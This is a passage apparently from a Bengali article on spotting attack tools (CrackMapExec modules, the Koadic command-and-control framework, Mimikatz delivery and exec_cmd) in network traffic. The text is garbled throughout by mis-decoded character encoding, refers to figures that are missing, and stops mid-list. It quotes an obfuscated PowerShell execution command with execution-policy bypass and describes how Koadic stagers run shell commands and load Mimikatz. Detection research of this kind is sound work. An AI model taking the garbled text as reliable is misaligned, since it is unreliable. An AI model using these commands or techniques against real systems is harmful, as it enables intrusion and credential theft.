āĻāĻŦāĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻĻā§āĻ° āĻāĻāĻāĻŋ āĻ¤āĻžāĻ˛āĻŋāĻāĻž, SRVSVC NetSessEnum āĻ āĻ¨ā§āĻ°ā§āĻ§ā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¸āĻā§āĻ°āĻŋāĻ¯āĻŧ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻ¸ā§āĻļāĻ¨ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¤āĻĨā§āĻ¯ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ LDAP āĻā§āĻ¯āĻŧā§āĻ°āĻŋ āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻŋāĻšā§āĻ¨āĻŋāĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤
āĻāĻžāĻ¤āĨ¤ 8. SMB āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¸āĻā§āĻ°āĻŋāĻ¯āĻŧ āĻ¸ā§āĻļāĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻĒāĻžāĻāĻ¯āĻŧāĻž
āĻāĻāĻžāĻĄāĻŧāĻžāĻ, āĻ
āĻĄāĻŋāĻāĻŋāĻ āĻ¸āĻā§āĻˇāĻŽ āĻāĻ°ā§ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ āĻļā§āĻ°ā§ āĻāĻ°āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻāĻāĻāĻŋ āĻāĻāĻĄāĻŋ 4688 (āĻĒā§āĻ°āĻ¸ā§āĻ¸ āĻ¤ā§āĻ°āĻŋ) āĻāĻŦāĻ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻ¨āĻžāĻŽ āĻ°āĻ¯āĻŧā§āĻā§ ÂĢC:WindowsSystem32cmd.exeÂģ
. āĻāĻāĻŋāĻ¤ā§ āĻāĻ˛ā§āĻ˛ā§āĻāĻ¯ā§āĻā§āĻ¯ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ˛āĻžāĻāĻ¨ āĻāĻ°ā§āĻā§āĻŽā§āĻ¨ā§āĻ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , âĻ , 40,41 )-jOIN'' ) "
enum_avproducts
enum_avproducts āĻŽāĻĄāĻŋāĻāĻ˛ āĻāĻžāĻ°ā§āĻ¯āĻāĻžāĻ°āĻŋāĻ¤āĻž āĻāĻŦāĻ āĻŦāĻžāĻ¸ā§āĻ¤āĻŦāĻžāĻ¯āĻŧāĻ¨ā§āĻ° āĻĻā§āĻˇā§āĻāĻŋāĻā§āĻŖ āĻĨā§āĻā§ āĻā§āĻŦ āĻāĻāĻ°ā§āĻˇāĻŖā§āĻ¯āĻŧāĨ¤ WMI āĻāĻĒāĻ¨āĻžāĻā§ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ āĻŦāĻā§āĻā§āĻ āĻĨā§āĻā§ āĻĄā§āĻāĻž āĻĒā§āĻ¤ā§ WQL āĻā§āĻ¯ā§āĻ¯āĻŧāĻžāĻ°ā§ āĻāĻžāĻˇāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĻā§āĻ¯āĻŧ, āĻ¯āĻž āĻŽā§āĻ˛āĻ¤ āĻāĻ CME āĻŽāĻĄāĻŋāĻāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°āĻž āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻ¸āĻ°āĻā§āĻāĻžāĻŽ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ AntiSpywareProduct āĻāĻŦāĻ AntiMirusProduct āĻā§āĻ˛āĻžāĻ¸ā§ āĻĒā§āĻ°āĻļā§āĻ¨ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§āĨ¤ āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ā§āĻ¯āĻŧ āĻĄā§āĻāĻž āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻŽāĻĄāĻŋāĻāĻ˛āĻāĻŋ rootSecurityCenter2 āĻ¨āĻžāĻŽāĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°ā§, āĻ¤āĻžāĻ°āĻĒāĻ° āĻāĻāĻāĻŋ WQL āĻā§āĻ¯āĻŧā§āĻ°āĻŋ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§ āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻĒāĻžāĻ¯āĻŧāĨ¤ āĻĄā§āĻŽā§āĻ° āĻāĻĒāĻ°. 9 āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻŦāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻĻā§āĻāĻžāĻ¯āĻŧ. āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻĻāĻžāĻšāĻ°āĻŖā§, āĻāĻāĻ¨ā§āĻĄā§āĻ āĻĄāĻŋāĻĢā§āĻ¨ā§āĻĄāĻžāĻ° āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻā§āĻā§āĨ¤
āĻāĻžāĻ¤āĨ¤ 9. enum_avproducts āĻŽāĻĄāĻŋāĻāĻ˛ā§āĻ° āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻāĻžāĻ°ā§āĻ¯āĻāĻ˛āĻžāĻĒ
āĻĒā§āĻ°āĻžāĻ¯āĻŧāĻļāĻ WMI (āĻā§āĻ°ā§āĻ¸ WMI-āĻ ā§āĻ¯āĻžāĻā§āĻāĻŋāĻāĻŋāĻāĻŋ) āĻ¨āĻŋāĻ°ā§āĻā§āĻˇāĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻ¯ā§ āĻāĻā§āĻ¨ā§āĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻāĻĒāĻ¨āĻŋ WQL āĻĒā§āĻ°āĻļā§āĻ¨āĻā§āĻ˛āĻŋ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻĻāĻ°āĻāĻžāĻ°ā§ āĻ¤āĻĨā§āĻ¯ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻŦāĻ¨ā§āĻ§ āĻāĻ°āĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¯āĻĻāĻŋ āĻāĻāĻŋ āĻ¸āĻā§āĻˇāĻŽ āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻ¤āĻžāĻšāĻ˛ā§ enum_avproducts āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻāĻāĻŋ āĻāĻžāĻ˛āĻžāĻ¨ā§ āĻšāĻ˛ā§, ID 11 āĻ¸āĻš āĻāĻāĻāĻŋ āĻāĻā§āĻ¨ā§āĻ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖ āĻāĻ°āĻž āĻšāĻŦā§āĨ¤ āĻāĻ¤ā§ āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻŽāĻž āĻĻā§āĻāĻ¯āĻŧāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻ¨āĻžāĻŽ āĻāĻŦāĻ rootSecurityCenter2 āĻ¨āĻžāĻŽāĻ¸ā§āĻĨāĻžāĻ¨ā§ āĻ¨āĻžāĻŽ āĻĨāĻžāĻāĻŦā§āĨ¤
āĻĒā§āĻ°āĻ¤āĻŋāĻāĻŋ āĻ¸āĻŋāĻāĻŽāĻ āĻŽāĻĄāĻŋāĻāĻ˛ā§āĻ° āĻ¨āĻŋāĻāĻ¸ā§āĻŦ āĻāĻ°ā§āĻāĻŋāĻĢā§āĻ¯āĻžāĻā§āĻ āĻāĻŋāĻ˛, āĻ¤āĻž āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ WQL āĻĒā§āĻ°āĻļā§āĻ¨āĻ āĻšā§āĻ āĻŦāĻž LDAP āĻāĻŦāĻ SMB-āĻ¤ā§ āĻ āĻ¸ā§āĻĒāĻˇā§āĻāĻ¤āĻž āĻāĻŦāĻ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ-āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻžāĻ°ā§āĻ¯āĻāĻ˛āĻžāĻĒ āĻ¸āĻš āĻāĻžāĻ¸ā§āĻ āĻļāĻŋāĻĄāĻŋāĻāĻ˛āĻžāĻ°ā§ āĻāĻāĻāĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻ§āĻ°āĻŖā§āĻ° āĻāĻžāĻ¸ā§āĻ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž āĻšā§āĻāĨ¤
KOADIC
āĻā§āĻĄāĻŋāĻā§āĻ° āĻāĻāĻāĻŋ āĻ¸ā§āĻŦāĻ¤āĻ¨ā§āĻ¤ā§āĻ° āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻšāĻ˛ āĻāĻāĻ¨ā§āĻĄā§āĻā§ āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻ¨āĻŋāĻ°ā§āĻŽāĻŋāĻ¤ āĻāĻžāĻāĻžāĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻŦāĻ āĻāĻŋāĻŦāĻŋāĻāĻ¸āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻĻā§āĻāĻžāĻˇā§āĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĨ¤ āĻāĻ āĻ āĻ°ā§āĻĨā§, āĻāĻāĻŋ āĻā§āĻŽāĻŋāĻ° āĻŦāĻžāĻāĻ°ā§ āĻŦāĻ¸āĻŦāĻžāĻ¸ā§āĻ° āĻĒā§āĻ°āĻŦāĻŖāĻ¤āĻž āĻ āĻ¨ā§āĻ¸āĻ°āĻŖ āĻāĻ°ā§ - āĻ āĻ°ā§āĻĨāĻžā§, āĻāĻāĻŋāĻ° āĻā§āĻ¨āĻ āĻŦāĻžāĻšā§āĻ¯āĻŋāĻ āĻ¨āĻŋāĻ°ā§āĻāĻ°āĻ¤āĻž āĻ¨ā§āĻ āĻāĻŦāĻ āĻāĻāĻŋ āĻŽāĻžāĻ¨āĻ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ¸āĻ°āĻā§āĻāĻžāĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻĒā§āĻ°ā§āĻŖāĻžāĻā§āĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ ā§āĻ¯āĻžāĻ¨ā§āĻĄ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ (CnC) āĻāĻ° āĻāĻāĻāĻŋ āĻā§āĻ˛, āĻāĻžāĻ°āĻŖ āĻ¸āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻĒāĻ°ā§, āĻāĻāĻāĻŋ "āĻāĻŽāĻĒā§āĻ˛āĻžāĻ¨ā§āĻ" āĻŽā§āĻļāĻŋāĻ¨ā§ āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻ¯āĻž āĻāĻāĻŋāĻā§ āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŖ āĻāĻ°āĻžāĻ° āĻ āĻ¨ā§āĻŽāĻ¤āĻŋ āĻĻā§āĻ¯āĻŧāĨ¤ āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻŽā§āĻļāĻŋāĻ¨, āĻā§āĻĄāĻŋāĻ āĻĒāĻ°āĻŋāĻāĻžāĻˇāĻžāĻ¯āĻŧ, āĻāĻāĻāĻŋ "āĻāĻŽā§āĻŦāĻŋ" āĻŦāĻ˛āĻž āĻšāĻ¯āĻŧāĨ¤ āĻ¯āĻĻāĻŋ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻĒāĻžāĻļā§ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖāĻ°ā§āĻĒā§ āĻāĻžāĻ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĒāĻ°ā§āĻ¯āĻžāĻĒā§āĻ¤ āĻ¸ā§āĻ¯ā§āĻ-āĻ¸ā§āĻŦāĻŋāĻ§āĻž āĻ¨āĻž āĻĨāĻžāĻā§, Koadic-āĻāĻ° āĻāĻžāĻā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻŦāĻžāĻāĻĒāĻžāĻ¸ (UAC āĻŦāĻžāĻāĻĒāĻžāĻ¸) āĻā§āĻļāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ¤āĻžāĻĻā§āĻ° āĻŦāĻžāĻĄāĻŧāĻžāĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽāĨ¤
āĻāĻžāĻ¤āĨ¤ 10. āĻā§āĻĄāĻŋāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻļā§āĻ˛
āĻļāĻŋāĻāĻžāĻ°āĻā§ āĻ āĻŦāĻļā§āĻ¯āĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻāĻžāĻ¯ā§āĻ āĻļā§āĻ°ā§ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻāĻāĻŋ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻ¤āĻžāĻā§ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻžāĻ-āĻĒā§āĻ°āĻ¸ā§āĻ¤ā§āĻ¤ āĻāĻāĻāĻ°āĻāĻ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§ āĻāĻŦāĻ āĻ¸ā§āĻā§āĻāĻžāĻ°āĻā§āĻ˛āĻŋāĻ° āĻāĻāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻŽā§āĻ˛ āĻā§āĻĄāĻŋāĻ āĻŦāĻĄāĻŋ āĻĒā§āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻĄā§āĻŽā§āĻ° āĻāĻĒāĻ°. 11 āĻ¸ā§āĻā§āĻāĻžāĻ° mshta āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻĻā§āĻāĻžāĻ¯āĻŧāĨ¤
āĻāĻžāĻ¤āĨ¤ 11. CnC āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸ā§āĻļāĻ¨ā§āĻ° āĻ¸ā§āĻāĻ¨āĻž
āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° WS āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛ā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§, āĻāĻāĻž āĻ¸ā§āĻĒāĻˇā§āĻ āĻšāĻ¯āĻŧā§ āĻ¯āĻžāĻ¯āĻŧ āĻ¯ā§ WScript.Shell āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻļāĻ¨ āĻāĻā§ āĻāĻŦāĻ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛ā§ āĻŦāĻ°ā§āĻ¤āĻŽāĻžāĻ¨ āĻ¸ā§āĻļāĻ¨ā§āĻ° āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻŽā§āĻ˛ āĻ¤āĻĨā§āĻ¯ āĻĨāĻžāĻā§āĨ¤ āĻāĻāĻŋ CnC āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ HTTP āĻ¸āĻāĻ¯ā§āĻā§ āĻĒā§āĻ°āĻĨāĻŽ āĻ āĻ¨ā§āĻ°ā§āĻ§-āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻā§āĻĄāĻŧāĻžāĨ¤ āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻ āĻ¨ā§āĻ°ā§āĻ§āĻā§āĻ˛āĻŋ āĻ¸āĻ°āĻžāĻ¸āĻ°āĻŋ āĻŦāĻ˛āĻž āĻŽāĻĄāĻŋāĻāĻ˛ (āĻāĻŽāĻĒā§āĻ˛āĻžāĻ¨ā§āĻ) āĻāĻ° āĻāĻžāĻ°ā§āĻ¯āĻāĻžāĻ°āĻŋāĻ¤āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤āĨ¤ āĻ¸āĻŽāĻ¸ā§āĻ¤ Koadic āĻŽāĻĄāĻŋāĻāĻ˛ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻāĻāĻāĻŋ āĻ¸āĻā§āĻ°āĻŋāĻ¯āĻŧ CnC āĻ¸ā§āĻļāĻ¨ā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻžāĻ āĻāĻ°ā§āĨ¤
Mimikatz
āĻ āĻŋāĻ āĻ¯ā§āĻŽāĻ¨ CME āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻžāĻ āĻāĻ°ā§, Koadic āĻāĻāĻāĻŋ āĻĒā§āĻĨāĻ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽ āĻšāĻŋāĻ¸āĻžāĻŦā§ Mimikatz-āĻāĻ° āĻ¸āĻžāĻĨā§ āĻāĻžāĻ āĻāĻ°ā§ āĻāĻŦāĻ āĻāĻāĻŋ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻāĻĒāĻžāĻ¯āĻŧ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻ¨āĻŋāĻā§ āĻāĻāĻāĻŋ Mimikatz āĻāĻŽāĻĒā§āĻ˛āĻžāĻ¨ā§āĻ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻ āĻ¨ā§āĻ°ā§āĻ§-āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻā§āĻĄāĻŧāĻž āĻĻā§āĻāĻ¯āĻŧāĻž āĻšāĻ˛ā§ˇ
āĻāĻžāĻ¤āĨ¤ 12. Koadic āĻ Mimikatz āĻ¸ā§āĻĨāĻžāĻ¨āĻžāĻ¨ā§āĻ¤āĻ°
āĻāĻĒāĻ¨āĻŋ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨ āĻāĻŋāĻāĻžāĻŦā§ āĻ āĻ¨ā§āĻ°ā§āĻ§ā§ URI āĻāĻ° āĻŦāĻŋāĻ¨ā§āĻ¯āĻžāĻ¸ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻāĻŋāĻ¤ā§ csrf āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛ā§āĻ° āĻāĻāĻāĻŋ āĻŽāĻžāĻ¨ āĻ°āĻ¯āĻŧā§āĻā§, āĻ¯āĻž āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻāĻŋāĻ¤ āĻŽāĻĄāĻŋāĻāĻ˛ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻĻāĻžāĻ¯āĻŧā§āĨ¤ āĻ¤āĻžāĻ° āĻ¨āĻžāĻŽā§āĻ° āĻĒā§āĻ°āĻ¤āĻŋ āĻā§āĻ¨ āĻŽāĻ¨ā§āĻ¯ā§āĻ āĻĻā§āĻŦā§āĻ¨ āĻ¨āĻž; āĻāĻŽāĻ°āĻž āĻ¸āĻŦāĻžāĻ āĻāĻžāĻ¨āĻŋ āĻ¯ā§ CSRF āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤ āĻāĻŋāĻ¨ā§āĻ¨āĻāĻžāĻŦā§ āĻŦā§āĻāĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻā§āĻĄāĻŋāĻā§āĻ° āĻāĻāĻ āĻĒā§āĻ°āĻ§āĻžāĻ¨ āĻ āĻāĻļ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¤ā§ āĻāĻ¸ā§āĻāĻŋāĻ˛, āĻ¯āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻŽāĻŋāĻŽāĻŋāĻāĻžāĻāĻ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻā§āĻĄ āĻ¯ā§āĻā§āĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻāĻŋ āĻŦā§āĻļ āĻŦāĻĄāĻŧ, āĻ¤āĻžāĻ āĻāĻ¸ā§āĻ¨ āĻŽā§āĻ˛ āĻĒāĻ¯āĻŧā§āĻ¨ā§āĻāĻā§āĻ˛āĻŋ āĻĻā§āĻā§āĻ¨āĨ¤ āĻāĻāĻžāĻ¨ā§ āĻŦā§āĻ¸64-āĻāĻ¨āĻā§āĻĄā§āĻĄ āĻŽāĻŋāĻŽāĻŋāĻāĻžāĻāĻ āĻ˛āĻžāĻāĻŦā§āĻ°ā§āĻ°āĻŋ, āĻ¸āĻŋāĻ°āĻŋāĻ¯āĻŧāĻžāĻ˛āĻžāĻāĻāĻĄ .NET āĻā§āĻ˛āĻžāĻ¸ āĻ¯āĻž āĻāĻāĻŋāĻā§ āĻāĻ¨āĻā§āĻā§āĻ āĻāĻ°āĻŦā§ āĻāĻŦāĻ āĻŽāĻŋāĻŽāĻŋāĻāĻžāĻāĻ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ°ā§āĻā§āĻŽā§āĻ¨ā§āĻāĨ¤ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻļāĻ¨ā§āĻ° āĻĢāĻ˛āĻžāĻĢāĻ˛ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻ¸ā§āĻĒāĻˇā§āĻ āĻĒāĻžāĻ ā§āĻ¯ā§ āĻĒā§āĻ°ā§āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤
āĻāĻžāĻ¤āĨ¤ 13. āĻāĻāĻāĻŋ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻŽā§āĻļāĻŋāĻ¨ā§ Mimikatz āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻĢāĻ˛āĻžāĻĢāĻ˛
Exec_cmd
āĻā§āĻĄāĻŋāĻā§āĻ°āĻ āĻŽāĻĄāĻŋāĻāĻ˛ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¯āĻž āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ˛āĻžāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻāĻžāĻ¨ā§ āĻāĻŽāĻ°āĻž āĻāĻāĻ URI āĻā§āĻ¨āĻžāĻ°ā§āĻļāĻ¨ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻāĻŦāĻ āĻĒāĻ°āĻŋāĻāĻŋāĻ¤ sid āĻāĻŦāĻ csrf āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦāĨ¤ exec_cmd āĻŽāĻĄāĻŋāĻāĻ˛ā§āĻ° āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻŦāĻĄāĻŋāĻ¤ā§ āĻā§āĻĄ āĻ¯ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻ¯āĻž āĻļā§āĻ˛ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽāĨ¤ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻā§āĻĄāĻāĻŋ CnC āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¤ā§ āĻĻā§āĻāĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻžāĻ¤āĨ¤ 14. āĻāĻŽāĻĒā§āĻ˛āĻžāĻ¨ā§āĻ āĻā§āĻĄ exec_cmd
āĻā§āĻĄ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻļāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻĒāĻ°āĻŋāĻāĻŋāĻ¤ WS āĻ ā§āĻ¯āĻžāĻā§āĻ°āĻŋāĻŦāĻŋāĻāĻ āĻ¸āĻš āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛ GAWTUUGCFI āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨āĨ¤ āĻāĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§, āĻāĻŽāĻĒā§āĻ˛āĻžāĻ¨ā§āĻāĻāĻŋ āĻļā§āĻ˛āĻā§ āĻāĻ˛ āĻāĻ°ā§, āĻĻā§āĻāĻŋ āĻā§āĻĄ āĻļāĻžāĻāĻž āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻ°āĻŖ āĻāĻ°ā§ - shell.exec āĻāĻāĻāĻĒā§āĻ āĻĄā§āĻāĻž āĻ¸ā§āĻā§āĻ°ā§āĻŽ āĻāĻŦāĻ shell.run āĻĢā§āĻ°āĻ¤ āĻ¨āĻž āĻĻāĻŋāĻ¯āĻŧā§āĨ¤
Koadic āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻā§āĻ˛ āĻ¨āĻ¯āĻŧ, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻāĻāĻŋāĻ° āĻ¨āĻŋāĻāĻ¸ā§āĻŦ āĻ¨āĻŋāĻĻāĻ°ā§āĻļāĻ¨ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¯āĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻāĻŋ āĻŦā§āĻ§ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§:
- HTTP āĻ āĻ¨ā§āĻ°ā§āĻ§ā§āĻ° āĻŦāĻŋāĻļā§āĻˇ āĻāĻ āĻ¨,
